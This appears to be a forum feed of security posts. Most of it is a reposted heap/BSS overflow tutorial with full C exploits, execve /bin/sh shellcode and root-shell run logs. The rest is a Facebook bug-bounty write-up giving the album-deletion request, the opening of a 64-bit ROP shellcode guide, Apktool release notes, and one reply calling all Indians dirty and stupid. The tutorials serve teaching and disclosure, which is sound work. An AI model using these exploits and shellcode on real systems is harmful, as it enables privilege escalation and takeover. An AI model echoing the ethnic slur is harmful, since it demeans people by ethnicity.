<garbage>\n", argv[0]); exit(ERROR); } tmpfile = "/tmp/vulprog.tmp"; /* no, this is not a temp file vul */ printf("before: tmpfile = %s\n", tmpfile); printf("Enter one line of data to put in %s: ", tmpfile); gets(buf); printf("\nafter: tmpfile = %s\n", tmpfile); tmpfd = fopen(tmpfile, "w"); if (tmpfd == NULL) { fprintf(stderr, "error opening %s: %s\n", tmpfile, strerror(errno)); exit(ERROR); } fputs(buf, tmpfd); fclose(tmpfd); } ----------------------------------------------------------------------------- The aim of this "example" program is to demonstrate that something of this nature can easily occur in programs (although hopefully not setuid or root-owned daemon servers). And here is our exploit for the vulnerable program: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * This will exploit vulprog1.c. It passes some arguments to the * program (that the vulnerable program doesn't use). The vulnerable * program expects us to enter one line of input to be stored * temporarily. However, because of a static buffer overflow, we can * overwrite the temporary filename pointer, to have it point to * argv[1] (which we could pass as "/root/.rhosts"). Then it will * write our temporary line to this file. So our overflow string (what * we pass as our input line) will be: * + + # (tmpfile addr) - (buf addr) # of A's | argv[1] address * * We use "+ +" (all hosts), followed by '#' (comment indicator), to * prevent our "attack code" from causing problems. Without the * "#", programs using .rhosts would misinterpret our attack code. * * Compile as: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 256 #define DIFF 16 /* estimated diff between buf/tmpfile in vulprog */ #define VULPROG "./vulprog1" #define VULFILE "/root/.rhosts" /* the file 'buf' will be stored in */ /* get value of sp off the stack (used to calculate argv[1] address) */ u_long getesp() { __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */ } int main(int argc, char **argv) { u_long addr; register int i; int mainbufsize; char *mainbuf, buf[DIFF+6+1] = "+ +\t# "; /* ------------------------------------------------------ */ if (argc <= 1) { fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]); exit(ERROR); } /* ------------------------------------------------------ */ memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); memset(buf + strlen(buf), 'A', DIFF); addr = getesp() + atoi(argv[1]); /* reverse byte order (on a little endian system) */ for (i = 0; i < sizeof(u_long); i++) buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255); mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13; mainbuf = (char *)malloc(mainbufsize); memset(mainbuf, 0, sizeof(mainbuf)); snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n", buf, VULPROG, VULFILE); printf("Overflowing tmpaddr to point to %p, check %s after.\n\n", addr, VULFILE); system(mainbuf); return 0; } ----------------------------------------------------------------------------- Here's what happens when we run it: [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 320 Overflowing tmpaddr to point to 0xbffffd60, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /vulprog1 Well, we can see that's part of argv[0] ("./vulprog1"), so we know we are close: [root /w00w00/heap/examples/vulpkgs/vulpkg1]# ./exploit1 330 Overflowing tmpaddr to point to 0xbffffd6a, check /root/.rhosts after. before: tmpfile = /tmp/vulprog.tmp Enter one line of data to put in /tmp/vulprog.tmp: after: tmpfile = /root/.rhosts [root /tmp/heap/examples/advanced/vul-pkg1]# Got it! The exploit overwrites the buffer that the vulnerable program uses for gets() input. At the end of its buffer, it places the address of where we assume argv[1] of the vulnerable program is. That is, we overwrite everything between the overflowed buffer and the tmpfile pointer. We ascertained the tmpfile pointer's location in memory by sending arbitrary lengths of "A"'s until we discovered how many "A"'s it took to reach the start of tmpfile's address. Also, if you have source to the vulnerable program, you can also add a "printf()" to print out the addresses/offsets between the overflowed data and the target data (i.e., 'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)'). (Un)fortunately, the offsets usually change at compile-time (as far as I know), but we can easily recalculate, guess, or "brute force" the offsets. Note: Now that we need a valid address (argv[1]'s address), we must reverse the byte order for little endian systems. Little endian systems use the least significant byte first (x86 is little endian) so that 0x12345678 is 0x78563412 in memory. If we were doing this on a big endian system (such as a sparc) we could drop out the code to reverse the byte order. On a big endian system (like sparc), we could leave the addresses alone. Further note: So far none of these examples required an executable heap! As I briefly mentioned in the "Why Heap/BSS Overflows are Significant" section, these (with the exception of the address byte order) previous examples were all system/architecture independent. This is useful in exploiting heap-based overflows. With knowledge of how to overwrite pointers, we're going to show how to modify function pointers. The downside to exploiting function pointers (and the others to follow) is that they require an executable heap. A function pointer (i.e., "int (*funcptr)(char *str)") allows a programmer to dynamically modify a function to be called. We can overwrite a function pointer by overwriting its address, so that when it's executed, it calls the function we point it to instead. This is good news because there are several options we have. First, we can include our own shellcode. We can do one of the following with shellcode: 1. argv[] method: store the shellcode in an argument to the program (requiring an executable stack) 2. heap offset method: offset from the top of the heap to the estimated address of the target/overflow buffer (requiring an executable heap) Note: There is a greater probability of the heap being executable than the stack on any given system. Therefore, the heap method will probably work more often. A second method is to simply guess (though it's inefficient) the address of a function, using an estimated offset of that in the vulnerable program. Also, if we know the address of system() in our program, it will be at a very close offset, assuming both vulprog/exploit were compiled the same way. The advantage is that no executable is required. Note: Another method is to use the PLT (Procedure Linking Table) which shares the address of a function in the PLT. I first learned the PLT method from str (stranJer) in a non-executable stack exploit for sparc. The reason the second method is the preferred method, is simplicity. We can guess the offset of system() in the vulprog from the address of system() in our exploit fairly quickly. This is synonymous on remote systems (assuming similar versions, operating systems, and architectures). With the stack method, the advantage is that we can do whatever we want, and we don't require compatible function pointers (i.e., char (*funcptr)(int a) and void (*funcptr)() would work the same). The disadvantage (as mentioned earlier) is that it requires an executable stack. Here is our vulnerable program for the following 2 exploits: ----------------------------------------------------------------------------- /* * Just the vulnerable program we will exploit. * Compile as: gcc -o vulprog vulprog.c (or change exploit macros) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 int goodfunc(const char *str); /* funcptr starts out as this */ int main(int argc, char **argv) { static char buf[BUFSIZE]; static int (*funcptr)(const char *str); if (argc <= 2) { fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]); exit(ERROR); } printf("(for 1st exploit) system() = %p\n", system); printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]); printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf); funcptr = (int (const char *str))goodfunc; printf("before overflow: funcptr points to %p\n", funcptr); memset(buf, 0, sizeof(buf)); strncpy(buf, argv[1], strlen(argv[1])); printf("after overflow: funcptr points to %p\n", funcptr); (void)(*funcptr)(argv[2]); return 0; } /* ---------------------------------------------- */ /* This is what funcptr would point to if we didn't overflow it */ int goodfunc(const char *str) { printf("\nHi, I'm a good function. I was passed: %s\n", str); return 0; } ----------------------------------------------------------------------------- Our first example, is the system() method: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * Demonstrates overflowing/manipulating static function pointers in * the bss (uninitialized data) to execute functions. * * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best) * To compile use: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define BUFSIZE 64 /* the estimated diff between funcptr/buf */ #define VULPROG "./vulprog" /* vulnerable program location */ #define CMD "/bin/sh" /* command to execute if successful */ #define ERROR -1 int main(int argc, char **argv) { register int i; u_long sysaddr; static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; if (argc <= 1) { fprintf(stderr, "Usage: %s <offset>\n", argv[0]); fprintf(stderr, "[offset = estimated system() offset]\n\n"); exit(ERROR); } sysaddr = (u_long)&system - atoi(argv[1]); printf("trying system() at 0x%lx\n", sysaddr); memset(buf, 'A', BUFSIZE); /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, CMD, NULL); return 0; } ----------------------------------------------------------------------------- When we run this with an offset of 16 (which may vary) we get: [root /w00w00/heap/examples]# ./exploit1 16 trying system() at 0x80484d0 (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd3c (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0x80484d0 bash# And our second example, using both argv[] and heap offset method: ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * This demonstrates how to exploit a static buffer to point the * function pointer at argv[] to execute shellcode. This requires * an executable heap to succeed. * * The exploit takes two argumenst (the offset and "heap"/"stack"). * For argv[] method, it's an estimated offset to argv[2] from * the stack top. For the heap offset method, it's an estimated offset * to the target/overflow buffer from the heap top. * * Try values somewhere between 325-345 for argv[] method, and 420-450 * for heap. * * To compile use: gcc -o exploit2 exploit2.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 /* estimated diff between buf/funcptr */ #define VULPROG "./vulprog" /* where the vulprog is */ char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* set sp as return value */ } int main(int argc, char **argv) { register int i; u_long sysaddr; char buf[BUFSIZE + sizeof(u_long) + 1]; if (argc <= 2) { fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]); exit(ERROR); } if (strncmp(argv[2], "stack", 5) == 0) { printf("Using stack for shellcode (requires exec. stack)\n"); sysaddr = getesp() + atoi(argv[1]); printf("Using 0x%lx as our argv[1] address\n\n", sysaddr); memset(buf, 'A', BUFSIZE + sizeof(u_long)); } else { printf("Using heap buffer for shellcode " "(requires exec. heap)\n"); sysaddr = (u_long)sbrk(0) - atoi(argv[1]); printf("Using 0x%lx as our buffer's address\n\n", sysaddr); if (BUFSIZE + 4 + 1 < strlen(shellcode)) { fprintf(stderr, "error: buffer is too small for shellcode " "(min. = %d bytes)\n", strlen(shellcode)); exit(ERROR); } strcpy(buf, shellcode); memset(buf + strlen(shellcode), 'A', BUFSIZE - strlen(shellcode) + sizeof(u_long)); } buf[BUFSIZE + sizeof(u_long)] = '\0'; /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- When we run this with an offset of 334 for the argv[] method we get: [root /w00w00/heap/examples] ./exploit2 334 stack Using stack for shellcode (requires exec. stack) Using 0xbffffd16 as our argv[1] address (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd16 (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0xbffffd16 bash# When we run this with an offset of 428-442 for the heap offset method we get: [root /w00w00/heap/examples] ./exploit2 428 heap Using heap buffer for shellcode (requires exec. heap) Using 0x804a9a8 as our buffer's address (for 1st exploit) system() = 0x80484d0 (for 2nd exploit, stack method) argv[2] = 0xbffffd16 (for 2nd exploit, heap offset method) buf = 0x804a9a8 before overflow: funcptr points to 0x8048770 after overflow: funcptr points to 0x804a9a8 bash# Note: Another advantage to the heap method is that you have a large working range. With argv[] (stack) method, it needed to be exact. With the heap offset method, any offset between 428-442 worked. As you can see, there are several different methods to exploit the same problem. As an added bonus, we'll include a final type of exploitation that uses jmp_bufs (setjmp/longjmp). jmp_buf's basically store a stack frame, and jump to it at a later point in execution. If we get a chance to overflow a buffer between setjmp() and longjmp(), that's above the overflowed buffer, this can be exploited. We can set these up to emulate the behavior of a stack-based overflow (as does the argv[] shellcode method used earlier, also). Now this is the jmp_buf for an x86 system. These will needed to be modified for other architectures, accordingly. First we will include a vulnerable program again: ----------------------------------------------------------------------------- /* * This is just a basic vulnerable program to demonstrate * how to overwrite/modify jmp_buf's to modify the course of * execution. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <setjmp.h> #define ERROR -1 #define BUFSIZE 16 static char buf[BUFSIZE]; jmp_buf jmpbuf; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { if (argc <= 1) { fprintf(stderr, "Usage: %s <string1> <string2>\n"); exit(ERROR); } printf("[vulprog] argv[2] = %p\n", argv[2]); printf("[vulprog] sp = 0x%lx\n\n", getesp()); if (setjmp(jmpbuf)) /* if > 0, we got here from longjmp() */ { fprintf(stderr, "error: exploit didn't work\n"); exit(ERROR); } printf("before:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); strncpy(buf, argv[1], strlen(argv[1])); /* actual copy here */ printf("after:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__bx, jmpbuf->__si, jmpbuf->__di); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__bp, jmpbuf->__sp, jmpbuf->__pc); longjmp(jmpbuf, 1); return 0; } ----------------------------------------------------------------------------- The reason we have the vulnerable program output its stack pointer (esp on x86) is that it makes "guessing" easier for the novice. And now the exploit for it (you should be able to follow it): ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * Demonstrates a method of overwriting jmpbuf's (setjmp/longjmp) * to emulate a stack-based overflow in the heap. By that I mean, * you would overflow the sp/pc of the jmpbuf. When longjmp() is * called, it will execute the next instruction at that address. * Therefore, we can stick shellcode at this address (as the data/heap * section on most systems is executable), and it will be executed. * * This takes two arguments (offsets): * arg 1 - stack offset (should be about 25-45). * arg 2 - argv offset (should be about 310-330). */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 16 #define VULPROG "./vulprog4" char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { int stackaddr, argvaddr; register int index, i, j; char buf[BUFSIZE + 24 + 1]; if (argc <= 1) { fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n", argv[0]); fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); fprintf(stderr, "[argv offset = offset to argv[2]]\n"); exit(ERROR); } stackaddr = getesp() - atoi(argv[1]); argvaddr = getesp() + atoi(argv[2]); printf("trying address 0x%lx for argv[2]\n", argvaddr); printf("trying address 0x%lx for sp\n\n", stackaddr); /* * The second memset() is needed, because otherwise some values * will be (null) and the longjmp() won't do our shellcode. */ memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE + 4, 0x1, 12); buf[BUFSIZE+24] = '\0'; /* ------------------------------------- */ /* * We need the stack pointer, because to set pc to our shellcode * address, we have to overwrite the stack pointer for jmpbuf. * Therefore, we'll rewrite it with the real address again. */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup BP */ { index = BUFSIZE + 16 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup SP */ { index = BUFSIZE + 20 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(u_long); i++) /* setup PC */ { index = BUFSIZE + 24 + i; buf[index] = (argvaddr >> (i * 8)) & 255; } execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- Ouch, that was sloppy. But anyway, when we run this with a stack offset of 36 and a argv[2] offset of 322, we get the following: [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322 trying address 0xbffffcf6 for argv[2] trying address 0xbffffb90 for sp [vulprog] argv[2] = 0xbffffcf6 [vulprog] sp = 0xbffffb90 before: bx = 0x0, si = 0x40001fb0, di = 0x4000000f bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715 after: bx = 0x1010101, si = 0x1010101, di = 0x1010101 bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6 bash# w00w00! For those of you that are saying, "Okay. I see this works in a controlled environment; but what about in the wild?" There is sensitive data on the heap that can be overflowed. Examples include: functions reason 1. *gets()/*printf(), *scanf() __iob (FILE) structure in heap 2. popen() __iob (FILE) structure in heap 3. *dir() (readdir, seekdir, ...) DIR entries (dir/heap buffers) 4. atexit() static/global function pointers 5. strdup() allocates dynamic data in the heap 7. getenv() stored data on heap 8. tmpnam() stored data on heap 9. malloc() chain pointers 10. rpc callback functions function pointers 11. windows callback functions func pointers kept on heap 12. signal handler pointers function pointers (note: unix tracks in cygnus (gcc for win), these in the kernel, not in the heap) Now, you can definitely see some uses these functions. Room allocated for FILE structures in functions such as printf()'s, fget()'s, readdir()'s, seekdir()'s, etc. can be manipulated (buffer or function pointers). atexit() has function pointers that will be called when the program terminates. strdup() can store strings (such as filenames or passwords) on the heap. malloc()'s own chain pointers (inside its pool) can be manipulated to access memory it wasn't meant to be. getenv() stores data on the heap, which would allow us modify something such as $HOME after it's initially checked. svc/rpc registration functions (librpc, libnsl, etc.) keep callback functions stored on the heap. We will demonstrate overwriting Windows callback functions and overwriting FILE (__iob) structures (with popen). Once you know how to overwrite FILE sturctures with popen(), you can quickly figure out how to do it with other functions (i.e., *printf, *gets, *scanf, etc.), as well as DIR structures (because they are similar. Now for some case studies! Our two "real world" vulnerabilities will be Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability was discovered by mudge of L0pht (see L0pht 1996 Advisory Page). We're reusing it because it's a textbook example of a heap-based overflow (though we will use our own method of exploitation). Our first case study will be the BSDI crontab heap-based overflow. We can pass a long filename, which will overflow a static buffer. Above that buffer in memory, we have a pwd (see pwd.h) structure! This stores a user's user name, password, uid, gid, etc. By overwriting the uid/gid field of the pwd, we can modify the privileges that crond will run our crontab with (as soon as it tries to run our crontab). This script could then put out a suid root shell, because our script will be running with uid/gid 0. Here is our exploit code: ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- When we run it on a BSDI X.X machine, we get the following: [Put exploit output here] 'tip' is run suid uucp on Solaris. It is possible to get root once uucp privileges are gained (but, that's outside the scope of this article). Tip will overflow a static buffer when prompting for a file to send/receive. Above the static buffer in memory is a jmp_buf. By overwriting the static buffer and then causing a SIGINT, we can get shellcode executed (by storing it in argv[]). To exploit successfully, we need to either connect to a valid system, or create a "fake device" with which tip will connect to. Here is our tip exploit: ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- When we run it on a Solaris 2.7 machine, we get the following: [Put exploit output here] Possible Fixes (Workarounds) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Obviously, the best prevention for heap-based overflows is writing good code! Similar to stack-based overflows, there is no real way of preventing heap-based overflows. We can get a copy of the bounds checking gcc/egcs (which should locate most potential heap-based overflows) developed by Richard Jones and Paul Kelly. This program can be downloaded from Richard Jone's homepage at http://www.annexia.demon.co.uk. It detects overruns that might be missed by human error. One example they use is: "int array[10]; for (i = 0; i <= 10; i++) array[i] = 1". I have never used it. Note: For Windows, one could use NuMega's bounds checker which essentially performs the same as the bounds checking gcc. We can always make a non-executable heap patch (as mentioned early, most systems have an executable heap). During a conversation I had with Solar Designer, he mentioned the main problems with a non-executable would involve compilers, interpreters, etc. Note: I added a note section here to reiterate the point a non-executable heap does NOT prevent heap overflows at all. It means we can't execute instructions in the heap. It does NOT prevent us from overwriting data in the heap. Likewise, another possibility is to make a "HeapGuard", which would be the equivalent to Cowan's StackGuard mentioned earlier. He (et. al.) also developed something called "MemGuard", but it's a misnomer. Its function is to prevent a return address (on the stack) from being overwritten (via canary values) on the stack. It does nothing to prevent overflows in the heap or bss. Acknowledgements ~~~~~~~~~~~~~~~~ There has been a significant amount of work on heap-based overflows in the past. We ought to name some other people who have published work involving heap/bss-based overflows (though, our work wasn't based off them). Solar Designer: SuperProbe exploit (function pointers), color_xterm exploit (struct pointers), WebSite (pointer arrays), etc. L0pht: Internet Explorer 4.01 vulnerablity (dildog), BSDI crontab exploit (mudge), etc. Some others who have published exploits for heap-based overflows (thanks to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam Morrison (stdioflow). I'm sure there are many others, and I apologize for excluding anyone. I'd also like to thank the following people who had some direct involvement in this article: str (stranJer), halflife, and jobe. Indirect involvements: Solar Designer, mudge, and other w00w00 affiliates. Other good sources of info include: as/gcc/ld info files (/usr/info/*), BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00 (http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc. Epilogue: Most people who claim their systems are "secure" are saying so out of a lack of knowledge (ignorant seemed a little too strong). Assuming security leads to a false sense of security (e.g., azrael.phrack.com, has remote vulnerabilities involving heap-based overflows that have gone unnoticed for quite a while). Hopefully, people will experiment with heap-based overflows, and in turn, will become more aware that the problems exist. We need to realize that the problems are out there, waiting to be fixed. Thanks for reading! We hope you've enjoyed it! You can e-mail me at shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org) web site, also! ------------------------------------------------------------------------------ Matt Conover (a.k.a. Shok) & w00w00 Security Team [ http://www.w00w00.org, w00w00 Security Development (WSD) ] [ See the URL above for information on: what w00w00 is, our ] [ security projects (all available online), some of our ] [ articles, and more. Enjoy! ] Sursa: http://www.cgsecurity.org/exploit/heaptut.txt
  17. Nytro

    Unban paxnwo

    A evoluat mult Pax in ultimii ani (uiiu). Lasand la o parte unele glume gay, e baiat ok. Pana si black_death a evoluat. Mi-a crescut inima cand l-am auzit ca intreaba ceva de "port" (ala pana la 65535, nu ala din Constanta) <3
  18. La cum arata ar fi bine sa fie Part 1 din 700. Nu a facut nimic indianu asta nespalat. Unde e analiza? Toti indienii sunt jegosi. Si prosti. Prosti de put.
  19. Homepage: Exploit Pack - Security A fost prezentat la un Blackhat 2014 parca.
  20. Cred ca asta fusese raportat si de noi.
  21. How I Hacked Your Facebook Photos What if your photos get deleted without your knowledge? Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted. Graph API is primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here. According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API. I tried to delete one of my photo albums using graph explorer access token. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbaj NEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVl aDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hl aSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKs GJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD Response :- {"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}} Why? Because this application doesn't have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn't it? Yeah and also it uses the same Graph API. so took a album id & Facebook for android access token of mine and tried it. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> Response :- true Album(518171421550249) got deleted so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> Response :- true OMG the album got deleted! So i got access to delete all of your Facebook photos (photos which are public or the photos i could see) lol Immediately reported this bug to Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgement of the report. Final Proof Of Concept :- Request :- DELETE /<Victim's_photo_album_id> HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Your(Attacker)_Facebook_for_Android_Access_Token> if you aren't sure about how to do it, please see this video First acknowledgement from Facebook security team Acknowledgement of fix and rewarded me $12500 USD for reporting this vulnerability. Now its completely fixed. Thank you Facebook Security Team for running bug bounty program and also for quickly fixing this issue Soon i ll get my listed for the year 2015 HALL OF FAME : https://www.facebook.com/whitehat/thanks Posted by Laxman Muthiyah at 00:30 Sursa: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html
  22. Apktool 2.0.0 RC4 Released February 12, 2015 Apktool 2.0.0 RC4 has been released. I was going to tag this version as 2.0 Gold, but since RC3 introduced a completely written aapt that caused a plethora of errors. I've decided to hold another release candidate. This released contained 47 commits by 6 people. 27 of the commits belonging to the updated smali release. Notable in this release is the fix that aapt introduced with implictly adding qualifiers. This caused resource directories to change from drawable-hdpi to drawable-hdpi-v11 as an example. This in theory shouldn't of broken anything, but bug reports proved otherwise. Since Apktool isn't your "first" tool to build an APK. I determined it was best to just skip this step of adding qualifiers. 0xD34D from Cyanogenhelped me figure that out. Changes since RC3 Updated to smali/baksmali 2.0.5 [#685] - Fixed select invalid attrs from Lollipop APKs [#713] - Added support for APKs that utilized Shared Resources [#329] - Fixed issue identifying strings that were named liked filepaths as ResFiles [#590] - Fixed isolated issue with segfaulting apks [#545] - Fixed issue with undefined attributes [#702] - Fixed invalid treating of MNC_ZERO which caused duplicate resources [#744] - Fixed ugly warnings of "Cleaning up unclosed ZipFile...." [#757] - Fixed downloading gradle over http, instead of https [#402] - Fixed issue with framework storage when user has no access to $HOME Notes There was no framework update in RC4, but if RC4 is your first version please delete the file at $HOME/apktool/framework/1.apk before trying RC4. Download Apktool 2.0.0 RC4 - md5 672f12efc5ffee79f3670f36cd6bbb64 Rename to apktool.jar and follow Instruction Guide if you need help. Links Github Bug Tracker XDA Thread Sursa: http://connortumbleson.com/2015/02/12/apktool-2-0-0-rc4-released/
  23. 64-bit Linux Return-Oriented Programming Nobody’s perfect. Particularly not programmers. Some days, we spend half our time fixing mistakes we made in the other half. And that’s when we’re lucky: often, a subtle bug escapes unnoticed into the wild, and we only learn of it after a monumental catastrophe. Some disasters are accidental. For example, an unlucky chain of events might result in the precise conditions needed to trigger an overlooked logic error. Other disasters are deliberate. Like an accountant abusing a tax loophole lurking in a labyrinth of complex rules, an attacker might discover a bug, then exploit it to take over many computers. Accordingly, modern systems are replete with security features designed to prevent evildoers from exploiting bugs. These safeguards might, for instance, hide vital information, or halt execution of a program as soon as they detect anomalous behaviour. Executable space protection is one such defence. Unfortunately, it is an ineffective defence. In this guide, we show how to circumvent executable space protection on 64-bit Linux using a technique known as return-oriented programming. Some assembly required We begin our journey by writing assembly to launch a shell via the execve system call. For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls. The following may aid those accustomed to 32-bit assembly. [TABLE=class: tableblock frame-all grid-all, width: 576] [TR] [TH=class: halign-left valign-top][/TH] [TH=class: halign-left valign-top]32-bit syscall[/TH] [TH=class: halign-left valign-top]64-bit syscall[/TH] [/TR] [TR] [TD=class: halign-left valign-top]instruction[/TD] [TD=class: halign-left valign-top]int $0x80[/TD] [TD=class: halign-left valign-top]syscall[/TD] [/TR] [TR] [TD=class: halign-left valign-top]syscall number[/TD] [TD=class: halign-left valign-top]EAX, e.g. execve = 0xb[/TD] [TD=class: halign-left valign-top]RAX, e.g. execve = 0x3b[/TD] [/TR] [TR] [TD=class: halign-left valign-top]up to 6 inputs[/TD] [TD=class: halign-left valign-top]EBX, ECX, EDX, ESI, EDI, EBP[/TD] [TD=class: halign-left valign-top]RDI, RSI, RDX, R10, R8, R9[/TD] [/TR] [TR] [TD=class: halign-left valign-top]over 6 inputs[/TD] [TD=class: halign-left valign-top]in RAM; EBX points to them[/TD] [TD=class: halign-left valign-top]forbidden[/TD] [/TR] [TR] [TD=class: halign-left valign-top]example[/TD] [TD=class: halign-left valign-top]mov $0xb, %eax lea string_addr, %ebx mov $0, %ecx mov $0, %edx int $0x80 [/TD] [TD=class: halign-left valign-top]mov $0x3b, %rax lea string_addr, %rdi mov $0, %rsi mov $0, %rdx syscall [/TD] [/TR] [/TABLE] We inline our assembly code in a C file, which we call shell.c: int main() { asm("\ needle0: jmp there\n\ here: pop %rdi\n\ xor %rax, %rax\n\ movb $0x3b, %al\n\ xor %rsi, %rsi\n\ xor %rdx, %rdx\n\ syscall\n\ there: call here\n\ .string \"/bin/sh\"\n\ needle1: .octa 0xdeadbeef\n\ "); } No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string. The needle0 and needle1 labels are to aid searches later on; so is the0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes). For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is 